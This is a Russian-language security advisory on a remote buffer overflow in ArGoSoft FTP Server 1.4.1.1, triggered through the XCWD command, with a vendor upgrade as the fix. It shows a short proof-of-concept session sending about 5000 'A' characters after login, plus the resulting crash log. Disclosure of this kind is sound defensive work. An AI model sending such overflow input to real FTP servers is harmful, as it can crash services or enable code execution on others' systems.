Удаленное переполнение буфера в ArGoSoft FTP Server
| Дата публикации: | 30.09.2003 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 1353 |
| Опасность: | Средняя |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Отказ в обслуживании |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | ArGoSoft FTP Server 1.4.x |
| Уязвимые версии: ArGoSoft FTP Server 1.4 (1.4.1.1)
Описание: Удаленное переполнение буфера обнаружено в ArGoSoft FTP Server. Удаленный атакующий может выполнить произвольный код на уязвимой системе. Переполнение буфера обнаружено в команде XCWD. Пример: c:\> putty.exe localhost 21 220 ArGoSoft FTP Server for Windows NT/2000/XP, Version 1.4 (1.4.1.1) user ftp 502 Unknown command user ftp 331 User name OK, need password pass ftp 230 User ftp logged in successfully ** XCWD AAAAAAA....(5000 times) client closed connection.В логах сервера можно увидеть что то типа такого: 9/22/2003 1:38:07 PM - FTP Server started. Listening on port 21 9/22/2003 1:38:34 PM - Requested FTP connection from 127.0.0.1 ID=1 9/22/2003 1:38:49 PM - ( 1) 'Error: Access violation at address 00401F32 in module 'ftpsrvnt.exe'. Write of address 41414145 URL производителя: http://www.argosoft.com/applications/ftpserver/ Решение: Установите последнюю версию программы (1.4.1.2): http://www.argosoft.com/applications/ftpserver/download.asp |